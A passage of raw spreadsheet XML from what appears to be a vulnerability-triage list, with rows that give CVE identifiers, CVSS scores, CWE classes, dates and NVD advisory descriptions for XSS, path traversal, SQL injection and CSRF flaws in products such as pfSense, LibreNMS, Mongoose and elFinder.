      <c r="Q920" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R920" s="5" t="inlineStr">
        <is>
          <t>xipblog module v2.0.1 and before for PrestaShop allows unauthenticated remote attackers to inject arbitrary JavaScript via the name and content parameters in ajax.php. The input is stored in the database without HTML sanitization and rendered in Smarty templates without output escaping, resulting in Stored Cross-Site Scripting (XSS). When an administrator reviews comments in the back office, the payload executes with admin-level session context, leading to full store compromise.</t>
        </is>
      </c>
      <c r="S920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38725</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38961</t>
        </is>
      </c>
      <c r="D921" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E921" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F921" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr"/>
      <c r="L921" s="5" t="inlineStr"/>
      <c r="M921" s="5" t="inlineStr"/>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P921" s="5" t="inlineStr"/>
      <c r="Q921" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R921" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS) vulnerability in the RSS Widget of Netgate pfSense Plus (versions 26.03, 25.11.1) and pfSense CE (version 2.8.1) allows remote authenticated attackers to inject arbitrary JavaScript via malicious content in an RSS feed title. The injected script executes in the browser of any authenticated user who views the dashboard, due to insufficient sanitization of feed title data before rendering in the widget.</t>
        </is>
      </c>
      <c r="S921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38961</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40635</t>
        </is>
      </c>
      <c r="D922" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E922" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F922" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr">
        <is>
          <t>dell:powerscale_onefs</t>
        </is>
      </c>
      <c r="L922" s="5" t="inlineStr"/>
      <c r="M922" s="5" t="inlineStr"/>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P922" s="5" t="inlineStr"/>
      <c r="Q922" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="R922" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS versions 9.12.0.0 through 9.13.1.0 contain an Insecure Temporary File vulnerability. A low privileged remote attacker could potentially exploit this vulnerability, leading to denial of service and information tampering.</t>
        </is>
      </c>
      <c r="S922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40635</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45694</t>
        </is>
      </c>
      <c r="D923" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E923" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F923" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr"/>
      <c r="L923" s="5" t="inlineStr"/>
      <c r="M923" s="5" t="inlineStr"/>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P923" s="5" t="inlineStr"/>
      <c r="Q923" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R923" s="5" t="inlineStr">
        <is>
          <t>LibreNMS is a network monitoring system. In versions up to and including 26.4.0, the Proxmox application view is vulnerable to reflected cross-site scripting through the user-supplied instance and vmid GET parameters, which are reflected into the page title without adequate encoding. The parameters are placed into the page title with only strip_tags applied, and the title is then written into an inline document.title assignment through string interpolation, so a single quote terminates the JavaScript string and the remaining input runs as script. An attacker who lures an authenticated user into following a crafted link can execute script in that user's session, enabling actions such as theft of session data. This issue is fixed in version 26.5.0.</t>
        </is>
      </c>
      <c r="S923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45694</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53956</t>
        </is>
      </c>
      <c r="D924" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E924" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F924" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr"/>
      <c r="L924" s="5" t="inlineStr"/>
      <c r="M924" s="5" t="inlineStr"/>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P924" s="5" t="inlineStr"/>
      <c r="Q924" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R924" s="5" t="inlineStr">
        <is>
          <t>Rattler is a library that provides common functionality used within the conda ecosystem. `rattler_cache` prior to version 0.9.0 and `py-rattler` prior to version 0.24.0 were vulnerable to package-cache path traversal when handling package metadata from conda channels. During cache materialization, the `ratter_cache` code used the package record `build` string as part of a cache key that was joined into a filesystem path. A malicious or untrusted channel could publish repodata with path separators or traversal components in that field, causing package contents to be written outside the configured package cache directory. The issue requires use of a malicious or otherwise untrusted conda channel. Curated channels that validate package metadata are not expected to allow malformed build strings of this form. Users should upgrade to `rattler_cache` version 0.9.0 or `py-rattler` version 0.24.0 and avoid untrusted conda channels.</t>
        </is>
      </c>
      <c r="S924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53956</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54256</t>
        </is>
      </c>
      <c r="D925" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E925" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F925" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr"/>
      <c r="L925" s="5" t="inlineStr"/>
      <c r="M925" s="5" t="inlineStr"/>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P925" s="5" t="inlineStr"/>
      <c r="Q925" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-639</t>
        </is>
      </c>
      <c r="R925" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, the backend FileUpload form widget trusted an attacker-controlled file_id POST parameter when resolving the attachment it operates on, allowing an authenticated backend user to read and modify attachment records belonging to other users or records. The widget's getFileRecord() lookup resolved the posted id against the global system_files table without verifying that the file belonged to the widget's own relation, parent record, or deferred-binding session. Because all attachments share a single File model and table and attachment ids are sequential integers that are easily enumerated, a user reaching any form with a fileupload field, including the built-in My Account avatar field that requires no specific permission, could target arbitrary attachments to modify their title and description via onSaveAttachmentConfig and change their sort order via onSortAttachments, which passed posted ids straight to an unscoped update. CSRF tokens remain enforced, so exploitation requires a valid authenticated backend session with any level of access. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54256</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54553</t>
        </is>
      </c>
      <c r="D926" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E926" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F926" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr"/>
      <c r="L926" s="5" t="inlineStr"/>
      <c r="M926" s="5" t="inlineStr"/>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P926" s="5" t="inlineStr"/>
      <c r="Q926" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-248, CWE-639</t>
        </is>
      </c>
      <c r="R926" s="5" t="inlineStr">
        <is>
          <t>Starlette-Admin is a fast, beautiful and extensible administrative interface framework for FastAPI and Starlette applications. Prior to 0.16.1, the list API does not validate user-supplied order_by and structured where field names against the configured sortable_fields and searchable_fields allowlists. An authenticated user with access to an affected list endpoint can submit arbitrary field names to starlette_admin/base.py and the BaseModelView validation path, bypassing restrictions presented by the administrative user interface. Requests can sort or filter on fields that are not intended to be sortable or searchable, causing limited information exposure. Invalid field names and special Python attribute names such as metadata and the class dunder attribute can also trigger unhandled exceptions and HTTP 500 responses, causing limited denial of service for targeted requests. This issue is fixed in version 0.16.1.</t>
        </is>
      </c>
      <c r="S926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54553</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55779</t>
        </is>
      </c>
      <c r="D927" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E927" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F927" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr"/>
      <c r="K927" s="5" t="inlineStr"/>
      <c r="L927" s="5" t="inlineStr"/>
      <c r="M927" s="5" t="inlineStr"/>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P927" s="5" t="inlineStr"/>
      <c r="Q927" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R927" s="5" t="inlineStr">
        <is>
          <t>Silverstripe Versioned provides versioning for Silverstripe models. Prior to 3.2.1, RestoreAction::getRestoreMessage() in src/RestoreAction.php builds ArchiveAdmin restore notifications rendered as CAST_HTML and inserts $restoredItem-&gt;Title, $restoredItem-&gt;URLSegment, $restoredItem-&gt;CMSEditLink(), and $changedProperty['value'] without applying Convert::raw2xml(). When an administrator restores an archived page containing a crafted title or URL segment, the generated restoration message can execute stored JavaScript in the administrator's browser, compromising the confidentiality and integrity of the CMS session. This issue is fixed in version 3.2.1.</t>
        </is>
      </c>
      <c r="S927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55779</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56127</t>
        </is>
      </c>
      <c r="D928" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E928" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr"/>
      <c r="K928" s="5" t="inlineStr"/>
      <c r="L928" s="5" t="inlineStr"/>
      <c r="M928" s="5" t="inlineStr"/>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P928" s="5" t="inlineStr"/>
      <c r="Q928" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R928" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Firewall: Rules: Edit privilege to inject arbitrary JavaScript via the descr parameter in /firewall_rules_edit.php. The firewall rule description is stored in the pfSense XML configuration with only backslash-escaping applied and no HTML sanitization, then rendered without encoding in the firewall log table in /status_logs_filter.php. The payload executes in the browser of any user with the Status: Logs: Firewall privilege who views the affected log entries.</t>
        </is>
      </c>
      <c r="S928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56127</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71802</t>
        </is>
      </c>
      <c r="D929" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E929" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F929" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr"/>
      <c r="L929" s="5" t="inlineStr"/>
      <c r="M929" s="5" t="inlineStr"/>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P929" s="5" t="inlineStr"/>
      <c r="Q929" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R929" s="5" t="inlineStr">
        <is>
          <t>A stored Cross-Site Scripting (XSS) vulnerability exists in the announcement preview component of REBUILD 4.4.3. Although the announcement content undergoes HTML escaping on the server side, the client-side preview code reverses the escaped entities using jQuery's `html().text()` method and subsequently injects the result into the DOM. An administrator or attacker capable of controlling the announcement content can exploit this vulnerability to execute arbitrary JavaScript code in the browsers of users viewing the affected pages "which may include the dashboard, activity feed, or login page, depending on the announcement's visibility settings.</t>
        </is>
      </c>
      <c r="S929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71802</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71803</t>
        </is>
      </c>
      <c r="D930" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E930" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F930" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr"/>
      <c r="L930" s="5" t="inlineStr"/>
      <c r="M930" s="5" t="inlineStr"/>
      <c r="N930" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P930" s="5" t="inlineStr"/>
      <c r="Q930" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R930" s="5" t="inlineStr">
        <is>
          <t>money-pos 1.0 contains a stored Cross-Site Scripting (XSS) vulnerability. When processing returns, the backend fails to filter or escape the goodsName parameter, directly concatenating it into the order log description; the frontend subsequently renders this content using v-html. An attacker with product creation privileges can inject a malicious JavaScript payload, causing unauthorized code execution when an administrator views the order logs.</t>
        </is>
      </c>
      <c r="S930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71803</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73254</t>
        </is>
      </c>
      <c r="D931" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E931" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F931" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr"/>
      <c r="L931" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr"/>
      <c r="Q931" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R931" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, an attacker who can create a file with an HTML payload in its name can trigger stored cross-site scripting when a user browses a directory served with MG_ENABLE_DIRLIST. The printdirentry() path called by listdir() in src/http.c URL-encodes the href but inserts the raw filesystem filename into the HTML link text. The browser executes the injected markup in the Mongoose origin, which can expose session data or permit actions as the victim. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73254</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73259</t>
        </is>
      </c>
      <c r="D932" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E932" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F932" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr"/>
      <c r="L932" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr"/>
      <c r="Q932" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R932" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote attacker can send a crafted percent-encoded request path to a deployment using MG_ENABLE_DIRLIST and persuade a user to visit it. The mg_http_serve_dir() and listdir() path in src/http.c places the decoded request URI into the title and h1 elements without HTML entity encoding. The resulting reflected cross-site scripting executes in the Mongoose origin and can expose session data or perform actions as the victim. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73259</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79640</t>
        </is>
      </c>
      <c r="D933" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E933" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F933" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L933" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr"/>
      <c r="Q933" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R933" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79640</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81888</t>
        </is>
      </c>
      <c r="D934" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E934" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F934" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr"/>
      <c r="L934" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr"/>
      <c r="Q934" s="5" t="inlineStr">
        <is>
          <t>CWE-1275, CWE-352</t>
        </is>
      </c>
      <c r="R934" s="5" t="inlineStr">
        <is>
          <t>@hono/oauth-providers is Authentication middleware for Hono. Prior to version 0.8.6, the built-in social login providers accept an OAuth callback even when the `state` value is absent on both sides, so the anti-CSRF check passes for a callback that never came from a genuine login attempt. This defeats the `state`-based CSRF protection under default usage. Version 0.8.6 has a patch.</t>
        </is>
      </c>
      <c r="S934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81888</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81890</t>
        </is>
      </c>
      <c r="D935" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E935" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F935" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr"/>
      <c r="L935" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr"/>
      <c r="Q935" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R935" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, the netmount command is omitted from elFinderConnector::$csrfProtectedCmds in php/elFinderConnector.class.php, so validateCsrfToken() is not called for this state-changing operation. In the shipped php/connector.minimal.php-dist configuration, FTP network mounts are enabled by default, and attacker-controlled protocol, host, path, port, user, pass, alias, and options arguments flow through elFinder::netmount() in php/elFinder.class.php to php/elFinderVolumeFTP.class.php. A cross-site request can therefore persist an attacker-chosen FTP mount in the victim's session, cause the PHP server to connect to an attacker-chosen FTP host and port, and send supplied credentials without an X-elFinder-CSRF token. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="S935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81890</t>
